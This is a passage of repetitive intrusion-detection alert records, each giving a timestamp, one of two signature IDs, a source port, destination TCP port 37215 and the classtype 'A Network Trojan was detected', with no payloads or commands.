          Timestamp:05/28/24-14:47:04.593293
          SID:2829579
          Source Port:44054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195157
          SID:2835222
          Source Port:51974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755583
          SID:2829579
          Source Port:58020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022335
          SID:2829579
          Source Port:49858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.281992
          SID:2829579
          Source Port:38400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202694
          SID:2835222
          Source Port:44084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431436
          SID:2835222
          Source Port:34956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102266
          SID:2829579
          Source Port:44662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176721
          SID:2835222
          Source Port:56292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938742
          SID:2829579
          Source Port:54356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123801
          SID:2835222
          Source Port:60380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.227245
          SID:2835222
          Source Port:59276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463528
          SID:2835222
          Source Port:60974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979023
          SID:2829579
          Source Port:55580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299645
          SID:2829579
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338404
          SID:2835222
          Source Port:45486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893513
          SID:2835222
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176410
          SID:2835222
          Source Port:53010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485459
          SID:2829579
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794940
          SID:2829579
          Source Port:46914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329598
          SID:2829579
          Source Port:56858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664518
          SID:2835222
          Source Port:55202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551216
          SID:2835222
          Source Port:42490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868959
          SID:2835222
          Source Port:49682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681354
          SID:2829579
          Source Port:33248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206985
          SID:2829579
          Source Port:58170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530163
          SID:2829579
          Source Port:38604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207003
          SID:2835222
          Source Port:34142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853287
          SID:2835222
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170653
          SID:2835222
          Source Port:55914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211474
          SID:2829579
          Source Port:60960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984307
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142830
          SID:2829579
          Source Port:33802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978367
          SID:2829579
          Source Port:39974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552246
          SID:2835222
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545878
          SID:2829579
          Source Port:46994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998427
          SID:2829579
          Source Port:52144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542098
          SID:2835222
          Source Port:40928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000601
          SID:2835222
          Source Port:38800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684605
          SID:2829579
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977562
          SID:2829579
          Source Port:48112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062377
          SID:2829579
          Source Port:57136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599619
          SID:2829579
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965182
          SID:2829579
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729659
          SID:2829579
          Source Port:56702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142789
          SID:2829579
          Source Port:41240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321130
          SID:2829579
          Source Port:56144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808878
          SID:2829579
          Source Port:35854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042441
          SID:2829579
          Source Port:60670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290616
          SID:2829579
          Source Port:51826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535485
          SID:2829579
          Source Port:56264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.306222
          SID:2829579
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008908
          SID:2835222
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338564
          SID:2829579
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849286
          SID:2829579
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083509
          SID:2829579
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891436
          SID:2835222
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367030
          SID:2829579
          Source Port:58424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744441
          SID:2829579
          Source Port:42550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243046
          SID:2835222
          Source Port:57032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202227
          SID:2835222
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234675
          SID:2829579
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.991500
          SID:2829579
          Source Port:53020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062074
          SID:2829579
          Source Port:60950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065554
          SID:2829579
          Source Port:51464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144924
          SID:2835222
          Source Port:41682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102382
          SID:2829579
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622211
          SID:2829579
          Source Port:39008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441714
          SID:2829579
          Source Port:47522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669972
          SID:2835222
          Source Port:44880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225875
          SID:2835222
          Source Port:40282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725101
          SID:2835222
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302219
          SID:2835222
          Source Port:57064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839505
          SID:2829579
          Source Port:46130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977395
          SID:2835222
          Source Port:36608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605231
          SID:2835222
          Source Port:34072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170715
          SID:2829579
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188105
          SID:2835222
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796932
          SID:2829579
          Source Port:48306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215643
          SID:2829579
          Source Port:58150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953576
          SID:2835222
          Source Port:54960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153026
          SID:2835222
          Source Port:33880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046973
          SID:2835222
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111692
          SID:2835222
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964195
          SID:2829579
          Source Port:45804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551095
          SID:2829579
          Source Port:51008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946688
          SID:2835222
          Source Port:40668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022271
          SID:2835222
          Source Port:50644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485738
          SID:2835222
          Source Port:56292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814608
          SID:2829579
          Source Port:42318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562525
          SID:2829579
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756320
          SID:2829579
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.335458
          SID:2835222
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940943
          SID:2829579
          Source Port:38012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168580
          SID:2835222
          Source Port:36778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976647
          SID:2835222
          Source Port:55292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195568
          SID:2835222
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914629
          SID:2835222
          Source Port:44064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622834
          SID:2835222
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878329
          SID:2835222
          Source Port:44880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062023
          SID:2829579
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738528
          SID:2829579
          Source Port:54510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984369
          SID:2829579
          Source Port:34474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156501
          SID:2829579
          Source Port:42050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510370
          SID:2829579
          Source Port:36360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559320
          SID:2829579
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062066
          SID:2829579
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.765455
          SID:2829579
          Source Port:41698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472329
          SID:2835222
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770910
          SID:2835222
          Source Port:49056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.376142
          SID:2835222
          Source Port:35332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272798
          SID:2829579
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067338
          SID:2835222
          Source Port:53408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657072
          SID:2829579
          Source Port:33740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268207
          SID:2829579
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291508
          SID:2835222
          Source Port:57766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886175
          SID:2835222
          Source Port:48784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486409
          SID:2835222
          Source Port:46616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774169
          SID:2829579
          Source Port:44636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183820
          SID:2829579
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735947
          SID:2835222
          Source Port:60158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359276
          SID:2829579
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561843
          SID:2835222
          Source Port:54584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544120
          SID:2835222
          Source Port:46628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357084
          SID:2835222
          Source Port:53994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324905
          SID:2835222
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812887
          SID:2829579
          Source Port:36912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794124
          SID:2829579
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180888
          SID:2829579
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.485745
          SID:2835222
          Source Port:60584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299302
          SID:2835222
          Source Port:59228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485939
          SID:2829579
          Source Port:54110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.928922
          SID:2829579
          Source Port:45462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411917
          SID:2835222
          Source Port:59066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.037211
          SID:2835222
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.035426
          SID:2835222
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399704
          SID:2835222
          Source Port:56030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062388
          SID:2835222
          Source Port:50098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295254
          SID:2835222
          Source Port:58238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301374
          SID:2835222
          Source Port:38638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782417
          SID:2829579
          Source Port:52972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225669
          SID:2829579
          Source Port:37984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203777
          SID:2835222
          Source Port:41302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045872
          SID:2829579
          Source Port:40876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927692
          SID:2835222
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249385
          SID:2835222
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041891
          SID:2835222
          Source Port:49798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196965
          SID:2835222
          Source Port:38342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298607
          SID:2829579
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669990
          SID:2835222
          Source Port:52388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810696
          SID:2829579
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239083
          SID:2835222
          Source Port:43514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839687
          SID:2829579
          Source Port:33606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551181
          SID:2835222
          Source Port:55952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764355
          SID:2829579
          Source Port:34902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181219
          SID:2835222
          Source Port:55398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146121
          SID:2835222
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845829
          SID:2835222
          Source Port:42424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270646
          SID:2829579
          Source Port:45554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227077
          SID:2835222
          Source Port:52574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237487
          SID:2829579
          Source Port:35516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592932
          SID:2829579
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738863
          SID:2829579
          Source Port:54184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233006
          SID:2835222
          Source Port:47552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246001
          SID:2835222
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325790
          SID:2829579
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977415
          SID:2835222
          Source Port:35434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851599
          SID:2829579
          Source Port:40756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144952
          SID:2829579
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484881
          SID:2835222
          Source Port:37564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144071
          SID:2829579
          Source Port:32800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339736
          SID:2829579
          Source Port:54886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609909
          SID:2829579
          Source Port:49562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668490
          SID:2829579
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160060
          SID:2835222
          Source Port:58794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328633
          SID:2835222
          Source Port:44278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810402
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168193
          SID:2829579
          Source Port:40802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178472
          SID:2829579
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816153
          SID:2835222
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625765
          SID:2835222
          Source Port:41002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497659
          SID:2835222
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817998
          SID:2829579
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271151
          SID:2829579
          Source Port:36174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923257
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708978
          SID:2829579
          Source Port:49340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850771
          SID:2829579
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907583
          SID:2835222
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525286
          SID:2835222
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627716
          SID:2835222
          Source Port:47592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214289
          SID:2829579
          Source Port:41434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325716
          SID:2829579
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304255
          SID:2835222
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299462
          SID:2835222
          Source Port:36254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187271
          SID:2835222
          Source Port:44044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063225
          SID:2835222
          Source Port:45406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557243
          SID:2835222
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530201
